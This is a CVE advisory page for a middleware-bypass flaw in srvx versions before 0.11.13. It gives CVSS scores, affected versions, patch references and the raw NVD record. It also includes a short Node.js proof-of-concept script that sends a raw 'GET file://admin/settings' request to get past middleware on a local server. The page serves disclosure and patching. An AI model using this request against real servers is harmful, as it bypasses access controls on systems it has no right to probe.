Security Vulnerability Report
CVE-2026-33732 CVSS 4.8 MEDIUM

CVE-2026-33732

Published: 2026-03-26 18:16:31
Last Modified: 2026-04-02 18:41:11

Description

srvx is a universal server based on web standards. Prior to version 0.11.13, a pathname parsing discrepancy in srvx's `FastURL` allows middleware bypass on the Node.js adapter when a raw HTTP request uses an absolute URI with a non-standard scheme (e.g. `file://`). Starting in version 0.11.13, the `FastURL` constructor now deopts to native `URL` for any string not starting with `/`, ensuring consistent pathname resolution.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:h3:srvx:*:*:*:*:*:node.js:*:* - VULNERABLE
srvx < 0.11.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-33732: srvx Middleware Bypass
// Target: srvx < 0.11.13 on Node.js adapter
// Description: Sending a raw HTTP request with a non-standard scheme bypasses middleware.
const net = require('net');

const host = '127.0.0.1';
const port = 3000; // Default srvx port

// Malicious payload using 'file://' scheme to trigger FastURL parsing issue
const payload = `GET file://admin/settings HTTP/1.1\r\n` +
  `Host: ${host}\r\n` +
  `Connection: close\r\n\r\n`;

const client = new net.Socket();

client.connect(port, host, () => {
  console.log('[*] Sending payload to bypass middleware...');
  client.write(payload);
});

client.on('data', (data) => {
  console.log('[+] Response received:');
  console.log(data.toString());
  client.destroy();
});

client.on('error', (err) => {
  console.error('[-] Connection error:', err.message);
});

References

https://github.com/h3js/h3/security/advisories/GHSA-p36q-q72m-gchr (Mitigation, Vendor Advisory)
https://github.com/h3js/srvx/commit/de0d69901c357f36a39b7e13eebef6c930652baa (Patch)
https://github.com/h3js/srvx/releases/tag/v0.11.13 (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33732", "sourceIdentifier": "[email protected]", "published": "2026-03-26T18:16:31.430", "lastModified": "2026-04-02T18:41:11.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "srvx is a universal server based on web standards. Prior to version 0.11.13, a pathname parsing discrepancy in srvx's `FastURL` allows middleware bypass on the Node.js adapter when a raw HTTP request uses an absolute URI with a non-standard scheme (e.g. `file://`). Starting in version 0.11.13, the `FastURL` constructor now deopts to native `URL` for any string not starting with `/`, ensuring consistent pathname resolution."}, {"lang": "es", "value": "srvx es un servidor universal basado en estándares web. Antes de la versión 0.11.13, una discrepancia en el análisis de rutas en el 'FastURL' de srvx permite la omisión de middleware en el adaptador de Node.js cuando una solicitud HTTP sin procesar utiliza una URI absoluta con un esquema no estándar (por ejemplo, 'file://'). A partir de la versión 0.11.13, el constructor 'FastURL' ahora recurre a la 'URL' nativa para cualquier cadena que no comience con '/', asegurando una resolución de rutas consistente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-706"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h3:srvx:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.11.13", "matchCriteriaId": "B8FAD178-5888-4A2F-B296-86871B71B721"}]}]}], "references": [{"url": "https://github.com/h3js/h3/security/advisories/GHSA-p36q-q72m-gchr", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/h3js/srvx/commit/de0d69901c357f36a39b7e13eebef6c930652baa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/h3js/srvx/releases/tag/v0.11.13", "source": "[email protected]", "tags": ["Release Notes"]}]}}